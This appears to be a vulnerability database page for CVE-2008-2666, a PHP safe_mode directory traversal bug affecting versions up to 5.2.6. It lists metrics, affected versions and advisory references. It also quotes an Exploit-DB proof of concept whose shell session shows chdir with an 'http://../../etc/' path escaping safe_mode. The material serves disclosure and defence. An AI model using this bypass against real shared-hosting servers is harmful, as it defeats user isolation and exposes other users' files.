CVE-2008-2666 : Detail

CVE-2008-2666

Directory Traversal
A01-Broken Access Control
0.53%V3
Network
2008-06-19
23h00 +00:00
2018-10-11
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple directory traversal vulnerabilities in PHP 5.2.6 and earlier allow context-dependent attackers to bypass safe_mode restrictions by creating a subdirectory named http: and then placing ../ (dot dot slash) sequences in an http URL argument to the (1) chdir or (2) ftok function.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 31937

Publication date : 2008-06-17 22h00 +00:00
Author : Maksymilian Arciemowicz
EDB Verified : Yes

source: https://www.securityfocus.com/bid/29796/info PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible. Exploiting these issues allows attackers to obtain sensitive data that could be used in other attacks. These vulnerabilities would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' restriction is expected to isolate users from each other. PHP 5.2.6 is vulnerable; other versions may also be affected. cxib# cat /www/wufff.php <? echo getcwd()."\n"; chdir("/etc/"); echo getcwd()."\n"; ?> cxib# ls -la /www/wufff.php -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php cxib# php /www/wufff.php /www Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3 /www cxib# ---/EXAMPLE1--- ---EXAMPLE2--- cxib# ls -la /www/wufff.php -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php cxib# ls -la /www/http: total 8 drwxr-xr-x 2 www www 512 Jun 17 17:12 . drwxr-xr-x 19 www www 4608 Jun 17 17:13 .. cxib# cat /www/wufff.php <? echo getcwd()."\n"; chdir("http://../../etc/"); echo getcwd()."\n"; ?> cxib# php /www/wufff.php /www /etc cxib#

Products Mentioned

Configuraton 0

Php>>Php >> Version To (including) 5.2.6

Php>>Php >> Version 5.0

    Php>>Php >> Version 5.0

      Php>>Php >> Version 5.0

        Php>>Php >> Version 5.0.0

        Php>>Php >> Version 5.0.1

        Php>>Php >> Version 5.0.2

        Php>>Php >> Version 5.0.3

        Php>>Php >> Version 5.0.4

        Php>>Php >> Version 5.0.5

        Php>>Php >> Version 5.1.0

        Php>>Php >> Version 5.1.1

        Php>>Php >> Version 5.1.2

        Php>>Php >> Version 5.1.3

        Php>>Php >> Version 5.1.4

        Php>>Php >> Version 5.1.5

        Php>>Php >> Version 5.1.6

        Php>>Php >> Version 5.2.0

        Php>>Php >> Version 5.2.1

        Php>>Php >> Version 5.2.2

        Php>>Php >> Version 5.2.3

        Php>>Php >> Version 5.2.4

        Php>>Php >> Version 5.2.5

        References

        http://secunia.com/advisories/32746
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://marc.info/?l=bugtraq&m=125631037611762&w=2
        Tags : vendor-advisory, x_refsource_HP
        http://support.apple.com/kb/HT3549
        Tags : x_refsource_CONFIRM
        http://securityreason.com/securityalert/3942
        Tags : third-party-advisory, x_refsource_SREASON
        http://security.gentoo.org/glsa/glsa-200811-05.xml
        Tags : vendor-advisory, x_refsource_GENTOO
        http://marc.info/?l=bugtraq&m=124654546101607&w=2
        Tags : vendor-advisory, x_refsource_HP
        http://www.securityfocus.com/bid/29796
        Tags : vdb-entry, x_refsource_BID
        http://secunia.com/advisories/35074
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://marc.info/?l=bugtraq&m=125631037611762&w=2
        Tags : vendor-advisory, x_refsource_HP
        http://www.us-cert.gov/cas/techalerts/TA09-133A.html
        Tags : third-party-advisory, x_refsource_CERT
        http://www.vupen.com/english/advisories/2009/1297
        Tags : vdb-entry, x_refsource_VUPEN
        http://www.securitytracker.com/id?1020328
        Tags : vdb-entry, x_refsource_SECTRACK
        http://marc.info/?l=bugtraq&m=124654546101607&w=2
        Tags : vendor-advisory, x_refsource_HP
        http://secunia.com/advisories/35650
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://securityreason.com/achievement_securityalert/55
        Tags : third-party-advisory, x_refsource_SREASONRES